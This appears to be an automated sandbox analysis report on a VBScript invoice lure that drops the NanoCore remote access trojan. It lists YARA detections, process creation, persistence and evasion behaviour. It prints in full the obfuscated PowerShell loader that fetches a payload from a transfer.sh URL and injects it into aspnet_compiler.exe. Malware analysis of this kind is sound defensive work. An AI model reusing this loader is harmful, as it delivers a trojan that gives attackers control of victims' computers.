Source: amsi64_2256.amsi.csv, type: OTHER	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 10.3.aspnet_compiler.exe.4488eef.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.3.aspnet_compiler.exe.4488eef.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.aspnet_compiler.exe.446ee96.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.3.aspnet_compiler.exe.446ee96.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.aspnet_compiler.exe.44834c1.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.3.aspnet_compiler.exe.44834c1.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.aspnet_compiler.exe.44834c1.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 10.3.aspnet_compiler.exe.4488eef.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.3.aspnet_compiler.exe.4488eef.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.aspnet_compiler.exe.4488eef.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 10.3.aspnet_compiler.exe.446ee96.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.3.aspnet_compiler.exe.446ee96.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.433457033.00000268A5E21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.436664872.00000268A5E20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.435967518.00000268A409A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000003.435054293.00000268A4349000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000003.434814918.00000268A4089000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.436347834.00000268A434A000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.271462749.0000014681106000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.428209979.0000014681671000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.435917609.00000268A408A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: Process Memory Space: aspnet_compiler.exe PID: 2272, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Users\Public\Run\New.vbs, type: DROPPED	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =

Source: 9 ITEMS INVOICE RECEIPT.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\9 ITEMS INVOICE RECEIPT.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace(''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace(''	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20210914

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svz2t0bn.kt3.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winVBS@6/10@27/2

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3020:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{401b59fa-a7f2-4468-a03b-04e3bc489e18}

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\9 ITEMS INVOICE RECEIPT.vbs'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000003.416431305.00000146FE64B000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POwerSheLL $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.", "0", "true");

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe:Zone.Identifier read attributes | delete

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
